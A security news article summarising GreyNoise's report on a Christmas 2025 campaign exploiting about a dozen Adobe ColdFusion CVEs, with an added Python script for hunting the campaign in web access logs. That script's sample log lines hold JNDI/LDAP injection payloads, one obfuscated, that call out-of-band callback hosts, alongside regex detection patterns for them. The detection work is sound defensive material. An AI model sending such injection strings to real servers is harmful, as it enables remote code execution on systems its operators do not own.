Security Affairs

Thousands of ColdFusion exploit attempts spotted during Christmas holiday


GreyNoise reports a coordinated campaign exploiting about a dozen Adobe ColdFusion vulnerabilities, with thousands of attack attempts observed during the Christmas 2025 holiday.

“GreyNoise observed a coordinated exploitation campaign targeting Adobe ColdFusion servers over the Christmas 2025 holiday period.” reads the report published by GreyNoise. “The attack appears to be a single threat actor operating from Japan-based infrastructure (CTG Server Limited). This source was responsible for ~98% of attack traffic, systematically exploiting 10+ ColdFusion CVEs from 2023-2024.”

A single actor, using Japan-based infrastructure, generated about 98% of the traffic and exploited more than 10 ColdFusion CVEs from 2023–2024. The attacks used ProjectDiscovery Interactsh for out-of-band verification, with JNDI/LDAP injection as the main vector. Most activity occurred on Christmas Day, suggesting deliberate timing to exploit reduced security monitoring.

The researchers observed 5,940 malicious requests exploiting ColdFusion vulnerabilities from 2023–2024, peaking on December 25.

Most of the requests targeted servers in the US (4,044), Spain (753), and India (128).

GreyNoise identified a dominant threat actor using two IPs (134.122.136[.]119, 134.122.136[.]96) hosted by CTG Server Limited (AS152194), responsible for nearly all observed ColdFusion exploitation traffic. The two IPs accounted for over 98% of requests, operated concurrently in many cases, shared Interactsh sessions, and showed automated, coordinated behavior cycling through multiple attack types. Minor activity came from a handful of secondary IPs across Canada, India, the US, and Cloudflare. CTG Server Limited, a Hong Kong–registered provider with rapid IP space growth, has prior links to phishing, spam, bogon routing, and weak abuse enforcement, raising concerns about its role as a permissive hosting environment.
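The two traits described above (a JNDI/LDAP lookup string in the request and an Interactsh callback domain as the out-of-band check) are cheap to hunt for in web server access logs, alongside the two indicator IPs. The script below is an added example, not GreyNoise's or Security Affairs' code: it parses combined-format access logs, URL-decodes the request, undoes the common `${lower:j}` / `${::-j}` obfuscation wrappers, and flags lines that carry a JNDI lookup, an OAST callback domain, or a source IP from the report. The list of public Interactsh domains and the ColdFusion path hints are assumptions to tune for your environment; the log lines are constructed for the demonstration.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# Indicator IPs named in the GreyNoise report quoted in the article.
IOC_IPS = {"134.122.136.119", "134.122.136.96"}

# Public Interactsh (OAST) server domains as known to the example's author;
# assumption, not a list from the article. Add any private OAST server you see.
OAST_DOMAINS = ("oast.fun", "oast.pro", "oast.live", "oast.site",
                "oast.online", "oast.me", "interact.sh")

# Path fragments that mark a request as aimed at ColdFusion (assumption: adjust).
CF_PATH_HINTS = ("/cfide/", "/cf_scripts/", ".cfm", ".cfc")

# JNDI lookup with a network scheme, matched after decoding and de-obfuscation.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop)", re.IGNORECASE)

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


@dataclass
class Finding:
    ip: str
    path: str
    cf_target: bool
    reasons: list = field(default_factory=list)


def normalize(s: str) -> str:
    """Decode twice (templates often double-encode) and strip the two most common
    Log4Shell-style wrappers so ${${lower:j}ndi:...} and ${${::-j}ndi:...} become ${jndi:...}."""
    s = unquote(unquote(s))
    s = re.sub(r"\$\{(?:lower|upper):(.)\}", r"\1", s, flags=re.IGNORECASE)
    s = re.sub(r"\$\{::-(.)\}", r"\1", s)
    return s.lower()


def analyze_line(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, path = m["ip"], m["path"]
    # Payloads land in the path, the Referer or the User-Agent; inspect all three.
    haystack = normalize(" ".join((path, m["referer"], m["ua"])))
    reasons = []
    if ip in IOC_IPS:
        reasons.append("source ip in IOC list")
    if JNDI_RE.search(haystack):
        reasons.append("jndi lookup string")
    if any(d in haystack for d in OAST_DOMAINS):
        reasons.append("interactsh oast callback domain")
    if not reasons:
        return None
    cf_target = any(h in path.lower() for h in CF_PATH_HINTS)
    return Finding(ip, path, cf_target, reasons)


def analyze(lines):
    return [f for f in (analyze_line(l) for l in lines) if f is not None]


# Constructed sample lines, not taken from the report; timestamps are illustrative.
SAMPLE_LOGS = [
    '134.122.136.119 - - [25/Dec/2025:03:14:07 +0000] "GET /CFIDE/administrator/index.cfm?x=%24%7Bjndi%3Aldap%3A%2F%2Fabc123.oast.fun%2Fa%7D HTTP/1.1" 404 512 "-" "Mozilla/5.0"',
    '134.122.136.96 - - [25/Dec/2025:03:14:09 +0000] "GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Dec/2025:03:15:00 +0000] "GET /index.cfm HTTP/1.1" 200 2048 "-" "${${lower:j}ndi:rmi://203.0.113.7:1099/x}"',
    '198.51.100.4 - - [25/Dec/2025:03:16:00 +0000] "GET /index.cfm HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOGS):
        print(f"{f.ip:16} cf={f.cf_target!s:5} {f.path}  <- {', '.join(f.reasons)}")
```

The IOC-IP match is the weakest signal on its own (hosting IPs get reassigned), so treat a JNDI string or an OAST domain as the trigger and the IP as corroboration; a hit on a server that returned 200 for a ColdFusion path is the one to pull the application logs for first.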

Below is the list of targeted ColdFusion vulnerabilities:

CVE              Type                      Requests
Generic RCE      Remote Code Execution        1,403
Generic LFI      Local File Inclusion           904
CVE-2023-26359   Deserialization RCE            833
CVE-2023-38205   Access Control Bypass          654
CVE-2023-44353   Remote Code Execution          611
CVE-2023-38203   Remote Code Execution          346
CVE-2023-38204   Remote Code Execution          346
CVE-2023-29298   Access Control Bypass          342
CVE-2023-29300   Remote Code Execution          176
CVE-2023-26347   Access Control Bypass          171
CVE-2024-20767   Arbitrary File Read            146
CVE-2023-44352   Reflected XSS                    8

Analysis shows the ColdFusion activity was only about 0.2% of a much larger vulnerability scanning campaign conducted from the same two IPs. Overall, the operation generated more than 2.5 million requests, targeting a total of 767 CVEs spanning 2001–2025, with over 1,200 attack signatures and thousands of unique fingerprints and out-of-band application security testing (OAST) callback domains.

The campaign focused mainly on reconnaissance, followed by CVE exploitation, LFI, and RCE attempts. It targeted more than 47 technology stacks, including Java application servers, web frameworks, CMS platforms, network devices, and enterprise software. The scale, breadth of CVEs, and automation indicators point to a systematic, template-based reconnaissance effort covering the global vulnerability landscape.

The experts published Indicators of Compromise for this campaign.


Pierluigi Paganini

(SecurityAffairs – hacking, Adobe)